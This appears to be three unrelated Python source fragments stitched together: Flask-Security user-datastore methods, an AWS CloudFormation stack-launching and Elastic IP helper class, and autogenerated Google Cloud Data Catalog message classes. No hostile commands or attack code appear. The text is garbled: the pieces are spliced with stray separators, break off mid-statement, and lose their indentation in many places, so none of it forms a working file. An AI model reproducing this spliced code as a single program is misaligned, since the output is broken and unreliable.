@permissions_required()
.. versionadded:: 3.3.0
"""
# By default we just use raw DB model create - for permissions we want to
# be nicer and allow sending in a list or set or comma separated string.
if "permissions" in kwargs and hasattr(self.role_model, "permissions"):
perms = kwargs["permissions"]
if isinstance(perms, list) or isinstance(perms, set):
perms = ",".join(perms)
elif isinstance(perms, str):
# squash spaces.
perms = ",".join([p.strip() for p in perms.split(",")])
kwargs["permissions"] = perms
role = self.role_model(**kwargs)
return self.put(role)
def find_or_create_role(self, name, **kwargs):
"""Returns a role matching the given name or creates it with any
additionally provided parameters.
"""
kwargs["name"] = name
return self.find_role(name) or self.create_role(**kwargs)
    def create_user(self, **kwargs):
        """Creates and returns a new user from the given parameters.
        :kwparam email: required.
        :kwparam password: the (already hashed) password to store for the user.
        :kwparam roles: list of roles to be added to user.
            Can be Role objects or strings
        .. note::
            No normalization is done on email - it is assumed the caller has already
            done that.
        .. danger::
            Be aware that whatever `password` is passed in will
            be stored directly in the DB. Do NOT pass in a plaintext password!
            Best practice is to pass in ``hash_password(plaintext_password)``.
            Furthermore, no validation nor normalization is done on the password
            (e.g for minimum length).
            Best practice is::
                pbad, pnorm = app.security._password_util.validate(password, True)
            Look for `pbad` being None. Pass the normalized password `pnorm` to this
            method.
        The new user's ``active`` property will be set to ``True``
        unless explicitly set to ``False`` in `kwargs`.
        """
        # Defaulting/role resolution happens in the shared helper.
        kwargs = self._prepare_create_user_args(**kwargs)
        user = self.user_model(**kwargs)
        return self.put(user)
def delete_user(self, user):
"""Deletes the specified user.
:param user: The user to delete
"""
self.delete(user)
    def reset_user_access(self, user):
        """
        Use this method to reset user authentication methods in the case of compromise.
        This will:
        * reset fs_uniquifier - which causes session cookie, remember cookie, auth
        tokens to be unusable
        * remove all unified signin TOTP secrets so those can't be used
        * remove all two-factor secrets so those can't be used
        Note that if using unified sign in and allow 'email' as a way to receive a code;
        if the email is compromised - login is still possible. To handle this - it
        is better to deactivate the user.
        Note - this method isn't used directly by Flask-Security - it is provided
        as a helper for an application's administrative needs.
        Remember to call commit on DB if needed.
        .. versionadded:: 3.4.1
        """
        self.set_uniquifier(user)
        # Only user models configured for unified sign-in / two-factor carry
        # these attributes, so each reset is guarded with hasattr.
        if hasattr(user, "us_totp_secrets"):
            self.us_reset(user)
        if hasattr(user, "tf_primary_method"):
            self.tf_reset(user)
def tf_set(self, user, primary_method, totp_secret=None, phone=None):
"""Set two-factor info into user record.
This carefully only changes things if different.
If totp_secret isn't provided - existing one won't be changed.
If phone isn't provided, the existing phone number won't be changed.
This could be called from an application to apiori setup a user for two factor
without the user having | |
if key in boolean_keys:
value = parser.getboolean(section_name, key)
if key in not_cfn_param_keys:
self.cfn_param_file_values[key] = value
else:
self.cfn_param_file_values[key] = value
params.append(
{
'ParameterKey': key,
'ParameterValue': str(value),
'UsePreviousValue': False
}
)
return params
@staticmethod
def url_check(url):
try:
result = urlparse.urlparse(url)
return result.scheme and result.netloc and result.path
except:
return False
    def cr_stack(self, stack_name, cfn_param_file, verbose=False, set_rollback='ROLLBACK', template=None):
        """
        Create a CloudFormation stack and wait for it to finish.

        Three steps:
        1. Validate template
        2. Build parameters file
        3. Launch Stack
        :param stack_name: name of the stack to create; must not already exist
        :param cfn_param_file: parameters file path; generated when falsy
        :param verbose: forwarded to build_cfn_param
        :param set_rollback: CloudFormation OnFailure action
        :param template: template URL or local file path; when None the
            template location is read from the parameters file
        :return: the create_stack response, or None when creation fails
        """
        response = None
        # Existence probe: describe_stacks succeeds only when the stack
        # already exists (then we exit); a ClientError means "not found".
        try:
            stk_response = self.client_cfn.describe_stacks(StackName=stack_name)
            print('The stack "{0}" exists. Exiting...'.format(stack_name))
            sys.exit()
        except ValueError as e:
            # NOTE(review): raising a fresh ValueError drops the original
            # message and traceback; a bare 'raise' would preserve them.
            raise ValueError
        except ClientError as e:
            pass
        if template is not None:
            # check if the template is a URL, or a local file
            if self.url_check(template):
                self.template_url = template
                self.validate_cfn_template(template_url=self.template_url)
                if not cfn_param_file:
                    cfn_param_file = self.build_cfn_param(stack_name, self.template_url, cli_template=template, verbose=verbose)
            else:
                template_path = os.path.abspath(template)
                self.validate_cfn_template(template_body=template_path)
                if not cfn_param_file:
                    cfn_param_file = self.build_cfn_param(stack_name, template_path, cli_template=template, verbose=verbose)
                self.template_body = self.parse_cfn_template(template_path)
        cfn_params = self.read_cfn_param_file(cfn_param_file)
        self.cfn_param_file = cfn_param_file
        # Resolve the template source recorded in the parameters file:
        # TemplateURL wins, TemplateBody is the fallback. The fallback is
        # chosen by matching the KeyError text -- NOTE(review): fragile; a
        # direct membership test on cfn_param_file_values would be safer.
        try:
            if self.cfn_param_file_values['TemplateURL']:
                self.template_url = self.cfn_param_file_values['TemplateURL']
                print("Using template from URL: {}".format(self.template_url))
        except Exception as e:
            if "TemplateURL" in str(e):
                try:
                    if self.cfn_param_file_values['TemplateBody']:
                        self.template_body = self.cfn_param_file_values['TemplateBody']
                        print("Using template file: {}".format(self.template_body))
                        self.template_body = self.parse_cfn_template(self.template_body)
                except Exception as e:
                    raise ValueError(e)
            else:
                raise ValueError(e)
        print("Attempting to launch {}".format(stack_name))
        try:
            if self.template_url:
                response = self.client_cfn.create_stack(
                    StackName=stack_name,
                    TemplateURL=self.template_url,
                    Parameters=cfn_params,
                    TimeoutInMinutes=600,
                    Capabilities=['CAPABILITY_IAM'],
                    OnFailure=set_rollback,
                    Tags=[
                        {
                            'Key': 'Name',
                            'Value': stack_name
                        },
                        {
                            # Remember the parameters file so del_stack can
                            # offer to clean it up later.
                            'Key': 'cfnctl_param_file',
                            'Value': os.path.basename(self.cfn_param_file)
                        },
                    ]
                )
            elif self.template_body:
                response = self.client_cfn.create_stack(
                    StackName=stack_name,
                    TemplateBody=self.template_body,
                    Parameters=cfn_params,
                    TimeoutInMinutes=600,
                    Capabilities=['CAPABILITY_IAM'],
                    OnFailure=set_rollback,
                    Tags=[
                        {
                            'Key': 'Name',
                            'Value': stack_name
                        },
                        {
                            'Key': 'cfnctl_param_file',
                            'Value': os.path.basename(self.cfn_param_file)
                        },
                    ]
                )
        except ClientError as e:
            print(e.response['Error']['Message'])
            return
        # Block until the stack reaches a terminal state, echoing events.
        stack_rc = self.stack_status(stack_name=stack_name)
        if stack_rc != 'CREATE_COMPLETE':
            print('Stack creation failed with {0}'.format(stack_rc))
            return
        # Post-launch fixups, each driven by an optional parameters-file key.
        self.asg = self.get_asg_from_stack(stack_name=stack_name)
        self.instances = self.get_inst_from_asg(self.asg)
        try:
            if self.cfn_param_file_values['EnableEnaVfi']:
                print("Instances finishing booting")
                time.sleep(60)
                self.enable_ena_vfi(self.instances)
        except KeyError:
            pass
        try:
            if self.cfn_param_file_values['AddNetInterfaces']:
                self.add_net_dev()
        except KeyError:
            pass
        stk_output = self.get_stack_output(stack_name)
        try:
            eip = stk_output['ElasticIP']
            self.set_elastic_ip(stack_eip=eip)
        except KeyError:
            pass
        self.stack_name = stack_name
        self.get_stack_info(stack_name=stack_name)
        return response
    def del_stack(self,stack_name, no_prompt=None):
        """Delete a stack and (optionally) its recorded parameters file.

        :param stack_name: name of the stack to delete
        :param no_prompt: when truthy, remove the parameters file without
            asking for confirmation
        :raises ValueError: on describe/delete failure or a non-200 HTTP
            status from delete_stack
        """
        try:
            stk_response = self.client_cfn.describe_stacks(StackName=stack_name)
            if stk_response['Stacks'][0]['StackStatus'] == "DELETE_IN_PROGRESS":
                print('{0} already being deleted'.format(stack_name))
                return
            # cr_stack tags the stack with 'cfnctl_param_file'; use that to
            # locate and optionally remove the matching parameters file.
            for t in (stk_response['Stacks'][0]['Tags']):
                if t['Key'] == "cfnctl_param_file":
                    f_path = os.path.join(self.cfn_param_file_dir, t['Value'])
                    if os.path.isfile(f_path):
                        if no_prompt:
                            try:
                                os.remove(f_path)
                                print('Removed parameters file {0}'.format(f_path))
                            except Exception as e:
                                raise ValueError(e)
                        else:
                            cli_val = input('Parameters file "{0}" exists, delete also? [y/N] '.format(f_path))
                            if not cli_val:
                                cli_val = 'n'
                            if cli_val.lower().startswith("y"):
                                try:
                                    os.remove(f_path)
                                    print('Removed parameters file {0}'.format(f_path))
                                except Exception as e:
                                    raise ValueError(e)
                            else:
                                pass
        except ClientError as e:
            # Stack lookup failed (e.g. no such stack) -- surface as ValueError.
            raise ValueError(e)
        print('Deleting {}'.format(stack_name))
        try:
            response = self.client_cfn.delete_stack(StackName=stack_name)
        except Exception as e:
            raise ValueError(e)
        sc = response['ResponseMetadata']['HTTPStatusCode']
        if sc != 200:
            errmsg = 'Problem deleting stack, status code {}'.format(sc)
            raise ValueError(errmsg)
        return
def ls_stacks(self, stack_name=None, show_deleted=False):
"""
Using paginator for getting stack info, as the client.list_stack() will not get older stacks (>6 months)
:param stack_name: stack_name
:param show_deleted: Should we show deleted stacks also, StackStatus == DELETE_COMPLETE
:return: dictionary of stacks, formatting needs to happen after the return
"""
all_stacks = list()
paginator = self.client_cfn.get_paginator('list_stacks')
response_iterator = paginator.paginate()
stacks = dict()
show_stack = False
for page in response_iterator:
all_stacks = page['StackSummaries']
for r in all_stacks:
if [r['StackName']] == stack_name:
show_stack = True
elif show_deleted and r['StackStatus'] == "DELETE_COMPLETE":
show_stack = True
elif r['StackStatus'] == "DELETE_COMPLETE":
show_stack = False
else:
show_stack = True
if show_stack:
try:
stacks[r['StackName']] = [str(r['CreationTime']), r['StackStatus'], r['TemplateDescription']]
except Exception as e:
stacks[r['StackName']] = [str(r['CreationTime']), r['StackStatus'], "No Description"]
return stacks
def create_net_dev(self, subnet_id_n, desc, sg):
"""
Creates a network device, returns the id
:return: network device id
"""
response = self.client_ec2.create_network_interface(SubnetId=subnet_id_n, Description=desc, Groups=[sg])
return response['NetworkInterface']['NetworkInterfaceId']
def attach_new_dev(self, i_id, dev_num, subnet_id, desc, sg):
net_dev_to_attach = (self.create_net_dev(subnet_id, desc, sg))
response = self.client_ec2.attach_network_interface(
DeviceIndex=dev_num,
InstanceId=i_id,
NetworkInterfaceId=net_dev_to_attach
)
return response['AttachmentId']
    def add_net_dev(self):
        """Attach extra network interfaces to every tracked instance until
        each reaches the 'TotalNetInterfaces' count from the parameters file.

        Relies on self.instances / self.stack_name / self.cfn_param_file_values
        having been populated (see cr_stack).
        :return: the last attach AttachmentId, or None if nothing was attached
        """
        print("Adding network interfaces")
        attach_resp = None
        for i in self.instances:
            instance = self.ec2.Instance(i)
            num_interfaces_b = (len(instance.network_interfaces))
            num_interfaces = num_interfaces_b
            num_int_count = 0
            while num_interfaces < int(self.cfn_param_file_values['TotalNetInterfaces']):
                attach_resp = self.attach_new_dev(i,
                                                  num_interfaces_b + num_int_count,
                                                  self.cfn_param_file_values['Subnet'],
                                                  self.stack_name + "-net_dev",
                                                  self.cfn_param_file_values['SecurityGroups']
                                                  )
                # Re-read the instance so the new attachment is counted.
                instance = self.ec2.Instance(i)
                num_interfaces = (len(instance.network_interfaces))
                num_int_count += 1
            print(" {0} {1} {2}".format(instance.id, num_interfaces_b, num_interfaces))
        # Give AWS a moment to settle the last attachment.
        time.sleep(10)
        return attach_resp
def get_stack_events(self, stack_name):
try:
paginator = self.client_cfn.get_paginator('describe_stack_events')
pages = paginator.paginate(StackName=stack_name, PaginationConfig={'MaxItems': 100})
return next(iter(pages))["StackEvents"]
except Exception as e:
raise ValueError(e)
    def stack_status(self, stack_name=None):
        """Poll stack events, printing each new one, until the stack itself
        reaches a terminal status.

        :param stack_name: stack to watch; defaults to self.stack_name
        :return: the terminal ResourceStatus (CREATE_COMPLETE,
            ROLLBACK_COMPLETE or CREATE_FAILED)
        """
        if stack_name is None:
            stack_name = self.stack_name
        all_events = list()
        events = True
        stack_return_list = [
            'CREATE_COMPLETE',
            'ROLLBACK_COMPLETE',
            'CREATE_FAILED'
        ]
        while events:
            stk_status = self.get_stack_events(stack_name)
            # API returns newest-first; reverse to print chronologically.
            for s in reversed(stk_status):
                event_id = s['EventId']
                if event_id not in all_events:
                    # De-duplicate across polling rounds.
                    all_events.append(event_id)
                    try:
                        print('{0:<38} : {1:<25} : {2}'.format(s['LogicalResourceId'], s['ResourceStatus'], s['ResourceStatusReason']))
                    except KeyError:
                        # Some events carry no ResourceStatusReason.
                        print('{0:<38} : {1:<25}'.format(s['LogicalResourceId'], s['ResourceStatus']))
                    except Exception as e:
                        raise ValueError(e)
                # Terminal status on the stack resource itself ends the watch.
                if s['LogicalResourceId'] == stack_name and s['ResourceStatus'] in stack_return_list:
                    events = False
                    return s['ResourceStatus']
            time.sleep(1)
    def has_elastic_ip(self, inst_arg=None):
        """Return the public IP of the first interface among the tracked
        instances that already has an Elastic IP association, else None.

        :param inst_arg: optional instance-id list.
            NOTE(review): when provided it overwrites self.instances as a
            side effect -- confirm callers expect that.
        """
        if not self.instances and inst_arg is None:
            print("Instance list is null, exiting")
            return
        if inst_arg is not None:
            self.instances = inst_arg
        for i in self.instances:
            response = self.client_ec2.describe_instances(InstanceIds=[i], DryRun=False)
            for r in response['Reservations']:
                for s in (r['Instances']):
                    for interface in s['NetworkInterfaces']:
                        response = self.client_ec2.describe_network_interfaces(
                            NetworkInterfaceIds=[interface['NetworkInterfaceId']],
                            DryRun=False)
                        for r_net in response['NetworkInterfaces']:
                            try:
                                # An AllocationId on the association marks an
                                # Elastic IP, not just an ephemeral public IP.
                                if r_net['Association'].get('AllocationId'):
                                    return r_net['Association'].get('PublicIp')
                            except KeyError:
                                # Interface has no 'Association' block at all.
                                pass
def get_netdev0_id(self, instance=None):
if instance is None:
print("Must specify one instance")
return
response = self.client_ec2.describe_instances(InstanceIds=[instance], DryRun=False)
for r in response['Reservations']:
for s in (r['Instances']):
for interface in s['NetworkInterfaces']:
if interface['Attachment']['DeviceIndex'] == 0:
return interface['NetworkInterfaceId']
    def set_elastic_ip(self, instances=None, stack_eip=None):
        """Associate an Elastic IP with one of the stack's instances.

        :param instances: instance ids; defaults to self.instances
        :param stack_eip: an existing EIP address to reuse; when None a
            fresh address is allocated
        :return: the associated IP, an existing IP if one was already
            attached, or (on ClientError) the last describe response
        """
        launch_time = dict()
        if instances is None:
            instances = self.instances
        has_eip = self.has_elastic_ip(instances)
        if has_eip:
            print('Elastic IP already allocated: ' + has_eip)
            return has_eip
        else:
            # Rank instances by launch time so the EIP lands deterministically.
            response = self.client_ec2.describe_instances(InstanceIds=instances, DryRun=False)
            for r in response['Reservations']:
                for resp_i in (r['Instances']):
                    i = resp_i['InstanceId']
                    time_tuple = (resp_i['LaunchTime'].timetuple())
                    launch_time_secs = time.mktime(time_tuple)
                    launch_time[i] = launch_time_secs
            launch_time_list = sorted(launch_time.items(), key=operator.itemgetter(1))
            # NOTE(review): index 1 selects the SECOND-oldest instance and
            # will IndexError on a single-instance stack -- confirm this is
            # intentional (index 0 would be the oldest).
            inst_to_alloc_eip = launch_time_list[1][0]
            netdev0 = self.get_netdev0_id(inst_to_alloc_eip)
            if not netdev0:
                print("Couldn't get first device")
                return
            try:
                if stack_eip is not None:
                    allocation_id = self.get_net_alloc_id(stack_eip)
                    ip_addr = stack_eip
                else:
                    allocation = self.client_ec2.allocate_address(Domain='vpc')
                    allocation_id = allocation['AllocationId']
                    ip_addr = allocation['PublicIp']
                response = self.client_ec2.associate_address(
                    AllocationId=allocation_id,
                    NetworkInterfaceId=netdev0
                )
                print('{0} now has Elastic IP address {1}'.format(inst_to_alloc_eip, ip_addr))
                return ip_addr
            except ClientError as e:
                print(e)
                # NOTE(review): on failure this returns whatever 'response'
                # last held (possibly the describe_instances result), not the
                # failed association -- confirm intended.
                return response
    def get_stack_output(self, stack_name=None):
        """Return the stack's Outputs as a dict.

        NOTE(review): the parsing loop below is commented out, so this
        currently always returns an empty dict -- which also means the
        ElasticIP output lookup in cr_stack never fires. Confirm whether
        the disabled block should be restored.
        """
        if stack_name is None:
            stack_name = self.stack_name
        stk_response = None
        try:
            stk_response = self.client_cfn.describe_stacks(StackName=stack_name)
        except ClientError as e:
            print(e)
        stk_output = dict()
        #for i in stk_response['Stacks']:
        #    try:
        #        for r in i['Outputs']:
        #            stk_output[r['OutputKey']] = r['OutputValue']
        #    except KeyError:
        #        print("No Outputs found")
        return stk_output
def get_net_alloc_id(self, ip=None):
if ip is None:
print("Must specify an IP address")
return
response = self.client_ec2.describe_addresses(PublicIps=[ip], DryRun=False)
for r in response['Addresses']:
return r['AllocationId']
def get_stack_info(self, stack_name=None):
if stack_name is None:
stack_name = self.stack_name
stack_status = self.ls_stacks(stack_name=stack_name)
for stack, i in sorted(stack_status.items()):
if stack == stack_name:
print("\nStatus:")
print('{0:<40.38} {1:<21.19} {2:<30.28} {3:<.30}'.format(stack, str(i[0]), i[1], i[2]))
print("")
response = self.client_cfn.describe_stacks(StackName=stack_name)
for i in response['Stacks']:
print('[Parameters]')
try:
for p in i['Parameters']:
print('{0:<38} = {1:<30}'.format(p['ParameterKey'], p['ParameterValue']))
except Exception as e:
print("No Parameters found")
raise ValueError(e)
print("")
print('[Outputs]')
try:
for o in i['Outputs']:
print('{0:<38} = {1:<30}'.format(o['OutputKey'], o['OutputValue']))
except Exception as e:
print("No Outputs found")
#print(ValueError(e))
print("")
return
@staticmethod
def get_bucket_and_key_from_url(url):
path = urlparse.urlparse(url).path
path_l = path.split('/')
bucket = path_l[1]
key = '/'.join(path_l[2:])
return bucket, key
def get_cfn_param_file(self, template=None):
self.cfn_param_file_basename = os.path.basename(template)
self.cfn_param_file = os.path.join(self.cfn_param_file_dir, self.cfn_param_file_basename)
return self.cfn_param_file
def rm_cfn_param_file(self, cfn_param_file=None):
if cfn_param_file is None:
cfn_param_file = self.cfn_param_file
print('Removing incomplete parameters file {0}'.format(cfn_param_file))
if os.path.exists(cfn_param_file):
os.remove(cfn_param_file)
return
else:
print('File does not exists: {0}'.format(cfn_param_file))
sys.exit()
sys.exit(1)
    def set_vpc_cfn_param_file(self, cfn_param_file='NULL', json_content=None, p=None ):
        """Prompt the user to pick a VPC and remember the choice on self.

        :param cfn_param_file: parameters file to delete when the choice is
            invalid; the 'NULL' sentinel means "use self.cfn_param_file"
        :param json_content: parsed template JSON, used by get_cli_value for
            the default value
        :param p: NOTE(review): unused here -- get_cli_value is called with
            self.vpc_variable_name instead; confirm whether p can be dropped.
        :return: the chosen VPC id, or None when the selection was invalid
        """
        ##print(self.vpc_variable_name)
        if cfn_param_file == 'NULL':
            cfn_param_file = self.cfn_param_file
        print('Getting VPC info...')
        all_vpcs = self.get_vpcs()
        vpc_ids = list()
        for vpc_k, vpc_values in all_vpcs.items():
            vpc_ids.append(vpc_k)
        #print(vpc_ids)
        for vpc_id, vpc_info in all_vpcs.items():
            try:
                print(' {0} | {1} | {2} | {3}'.format(vpc_id, vpc_info['CidrBlock'], vpc_info['IsDefault'],
                                                      vpc_info['Tag_Name']))
            except:
                # VPC has no Name tag; print without it.
                print(' {0} | {1} | {2}'.format(vpc_id, vpc_info['CidrBlock'], vpc_info['IsDefault']))
        prompt_msg = "Select VPC"
        cli_val = self.get_cli_value(json_content, self.vpc_variable_name, prompt_msg)
        if cli_val not in vpc_ids:
            print("Valid VPC required. Exiting... ")
            # An invalid selection invalidates the half-built parameters file.
            self.rm_cfn_param_file(cfn_param_file)
            return
        self.vpc_id = cli_val
        return self.vpc_id
def get_cli_value(self, json_content, p, prompt_msg):
cli_val = ""
default_val = ""
try:
default_val = json_content['Parameters'][p]['Default']
except KeyError:
pass
cli_val = input('{0} [{1}]: '.format(prompt_msg, default_val))
if cli_val == "":
cli_val = default_val
cli_val | |
# Source file: google-cloud-sdk/lib/googlecloudsdk/third_party/apis/datacatalog/v1beta1/datacatalog_v1beta1_messages.py
"""Generated message classes for datacatalog version v1beta1.
A fully managed and highly scalable data discovery and metadata management
service.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'datacatalog'
class Binding(_messages.Message):
  r"""Associates `members` with a `role`.
  Fields:
    condition: The condition that is associated with this binding. NOTE: An
      unsatisfied condition will not allow user access via current binding.
      Different bindings, including their conditions, are examined
      independently.
    members: Specifies the identities requesting access for a Cloud Platform
      resource. `members` can have the following values: * `allUsers`: A
      special identifier that represents anyone who is on the internet;
      with or without a Google account. * `allAuthenticatedUsers`: A special
      identifier that represents anyone who is authenticated with a Google
      account or a service account. * `user:{emailid}`: An email address that
      represents a specific Google account. For example,
      `alice@example.com` . * `serviceAccount:{emailid}`: An email address
      that represents a service account. For example, `my-other-
      app@appspot.gserviceaccount.com`. * `group:{emailid}`: An email address
      that represents a Google group. For example, `admins@example.com`. *
      `deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique
      identifier) representing a user that has been recently deleted. For
      example, `alice@example.com?uid=123456789012345678901`. If the user is
      recovered, this value reverts to `user:{emailid}` and the recovered user
      retains the role in the binding. *
      `deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address
      (plus unique identifier) representing a service account that has been
      recently deleted. For example, `my-other-
      app@appspot.gserviceaccount.com?uid=123456789012345678901`. If the
      service account is undeleted, this value reverts to
      `serviceAccount:{emailid}` and the undeleted service account retains the
      role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An
      email address (plus unique identifier) representing a Google group
      that has been recently deleted. For example,
      `admins@example.com?uid=123456789012345678901`. If the group is
      recovered, this value reverts to `group:{emailid}` and the recovered
      group retains the role in the binding. * `domain:{domain}`: The G
      Suite domain (primary) that represents all the users of that domain.
      For example, `google.com` or `example.com`.
    role: Role that is assigned to `members`. For example, `roles/viewer`,
      `roles/editor`, or `roles/owner`.
  """

  # Numeric arguments are the wire-format field tags assigned by the
  # generator; do not renumber.
  condition = _messages.MessageField('Expr', 1)
  members = _messages.StringField(2, repeated=True)
  role = _messages.StringField(3)
class DatacatalogEntriesLookupRequest(_messages.Message):
r"""A DatacatalogEntriesLookupRequest object.
Fields:
linkedResource: The full name of the Google Cloud Platform resource the
Data Catalog entry represents. See:
https://cloud.google.com/apis/design/resource_names#full_resource_name.
Full names are case-sensitive. Examples: * //bigquery.googleapis.com/
projects/projectId/datasets/datasetId/tables/tableId *
//pubsub.googleapis.com/projects/projectId/topics/topicId
sqlResource: The SQL name of the entry. SQL names are case-sensitive.
Examples: * `cloud_pubsub.project_id.topic_id` *
``pubsub.project_id.`topic.id.with.dots` `` *
`bigquery.table.project_id.dataset_id.table_id` *
`bigquery.dataset.project_id.dataset_id` *
`datacatalog.entry.project_id.location_id.entry_group_id.entry_id`
`*_id`s shoud satisfy the standard SQL rules for identifiers.
https://cloud.google.com/bigquery/docs/reference/standard-sql/lexical.
"""
linkedResource = _messages.StringField(1)
sqlResource = _messages.StringField(2)
class DatacatalogProjectsLocationsEntryGroupsCreateRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsCreateRequest object.
Fields:
entryGroupId: Required. The id of the entry group to create. The id must
begin with a letter or underscore, contain only English letters, numbers
and underscores, and be at most 64 characters.
googleCloudDatacatalogV1beta1EntryGroup: A
GoogleCloudDatacatalogV1beta1EntryGroup resource to be passed as the
request body.
parent: Required. The name of the project this entry group is in. Example:
* projects/{project_id}/locations/{location} Note that this EntryGroup
and its child resources may not actually be stored in the location in
this name.
"""
entryGroupId = _messages.StringField(1)
googleCloudDatacatalogV1beta1EntryGroup = _messages.MessageField('GoogleCloudDatacatalogV1beta1EntryGroup', 2)
parent = _messages.StringField(3, required=True)
class DatacatalogProjectsLocationsEntryGroupsDeleteRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsDeleteRequest object.
Fields:
force: Optional. If true, deletes all entries in the entry group.
name: Required. The name of the entry group. For example,
`projects/{project_id}/locations/{location}/entryGroups/{entry_group_id}
`.
"""
force = _messages.BooleanField(1)
name = _messages.StringField(2, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesCreateRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesCreateRequest object.
Fields:
entryId: Required. The id of the entry to create.
googleCloudDatacatalogV1beta1Entry: A GoogleCloudDatacatalogV1beta1Entry
resource to be passed as the request body.
parent: Required. The name of the entry group this entry is in. Example:
*
projects/{project_id}/locations/{location}/entryGroups/{entry_group_id}
Note that this Entry and its child resources may not actually be stored
in the location in this name.
"""
entryId = _messages.StringField(1)
googleCloudDatacatalogV1beta1Entry = _messages.MessageField('GoogleCloudDatacatalogV1beta1Entry', 2)
parent = _messages.StringField(3, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesDeleteRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesDeleteRequest object.
Fields:
name: Required. The name of the entry. Example: * projects/{project_id}/l
ocations/{location}/entryGroups/{entry_group_id}/entries/{entry_id}
"""
name = _messages.StringField(1, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesGetIamPolicyRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesGetIamPolicyRequest
object.
Fields:
getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the
request body.
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1)
resource = _messages.StringField(2, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesGetRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesGetRequest object.
Fields:
name: Required. The name of the entry. Example: * projects/{project_id}/l
ocations/{location}/entryGroups/{entry_group_id}/entries/{entry_id}
Entry groups are logical groupings of entries. Currently, users cannot
create/modify entry groups. They are created by Data Catalog; they
include `@bigquery` for all BigQuery entries, and `@pubsub` for all
Cloud Pub/Sub entries.
"""
name = _messages.StringField(1, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesPatchRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesPatchRequest object.
Fields:
googleCloudDatacatalogV1beta1Entry: A GoogleCloudDatacatalogV1beta1Entry
resource to be passed as the request body.
name: The Data Catalog resource name of the entry in URL format. Example:
* projects/{project_id}/locations/{location}/entryGroups/{entry_group_id
}/entries/{entry_id} Note that this Entry and its child resources may
not actually be stored in the location in this name.
updateMask: The fields to update on the entry. If absent or empty, all
modifiable fields are updated. The following fields are modifiable: *
For entries with type `DATA_STREAM`: * `schema` * For entries with
type `FILESET` * `schema` * `display_name` * `description` *
`gcs_fileset_spec` * `gcs_fileset_spec.file_patterns`
"""
googleCloudDatacatalogV1beta1Entry = _messages.MessageField('GoogleCloudDatacatalogV1beta1Entry', 1)
name = _messages.StringField(2, required=True)
updateMask = _messages.StringField(3)
class DatacatalogProjectsLocationsEntryGroupsEntriesTagsCreateRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsCreateRequest
object.
Fields:
googleCloudDatacatalogV1beta1Tag: A GoogleCloudDatacatalogV1beta1Tag
resource to be passed as the request body.
parent: Required. The name of the resource to attach this tag to. Tags can
be attached to Entries. Example: * projects/{project_id}/locations/{loc
ation}/entryGroups/{entry_group_id}/entries/{entry_id} Note that this
Tag and its child resources may not actually be stored in the location
in this name.
"""
googleCloudDatacatalogV1beta1Tag = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 1)
parent = _messages.StringField(2, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesTagsDeleteRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsDeleteRequest
object.
Fields:
name: Required. The name of the tag to delete. Example: * projects/{proje
ct_id}/locations/{location}/entryGroups/{entry_group_id}/entries/{entry_
id}/tags/{tag_id}
"""
name = _messages.StringField(1, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesTagsListRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsListRequest object.
Fields:
pageSize: The maximum number of tags to return. Default is 10. Max limit
is 1000.
pageToken: Token that specifies which page is requested. If empty, the
first page is returned.
parent: Required. The name of the Data Catalog resource to list the tags
of. The resource could be an Entry.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
parent = _messages.StringField(3, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesTagsPatchRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesTagsPatchRequest object.
Fields:
googleCloudDatacatalogV1beta1Tag: A GoogleCloudDatacatalogV1beta1Tag
resource to be passed as the request body.
name: The resource name of the tag in URL format. Example: * projects/{pr
oject_id}/locations/{location}/entrygroups/{entry_group_id}/entries/{ent
ry_id}/tags/{tag_id} where `tag_id` is a system-generated identifier.
Note that this Tag may not actually be stored in the location in this
name.
updateMask: The fields to update on the Tag. If absent or empty, all
modifiable fields are updated. Currently the only modifiable field is
the field `fields`.
"""
googleCloudDatacatalogV1beta1Tag = _messages.MessageField('GoogleCloudDatacatalogV1beta1Tag', 1)
name = _messages.StringField(2, required=True)
updateMask = _messages.StringField(3)
class DatacatalogProjectsLocationsEntryGroupsEntriesTestIamPermissionsRequest(_messages.Message):
r"""A
DatacatalogProjectsLocationsEntryGroupsEntriesTestIamPermissionsRequest
object.
Fields:
resource: REQUIRED: The resource for which the policy detail is being
requested. See the operation documentation for the appropriate value for
this field.
testIamPermissionsRequest: A TestIamPermissionsRequest resource to be
passed as the request body.
"""
resource = _messages.StringField(1, required=True)
testIamPermissionsRequest = _messages.MessageField('TestIamPermissionsRequest', 2)
class DatacatalogProjectsLocationsEntryGroupsGetIamPolicyRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsGetIamPolicyRequest object.
Fields:
getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the
request body.
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
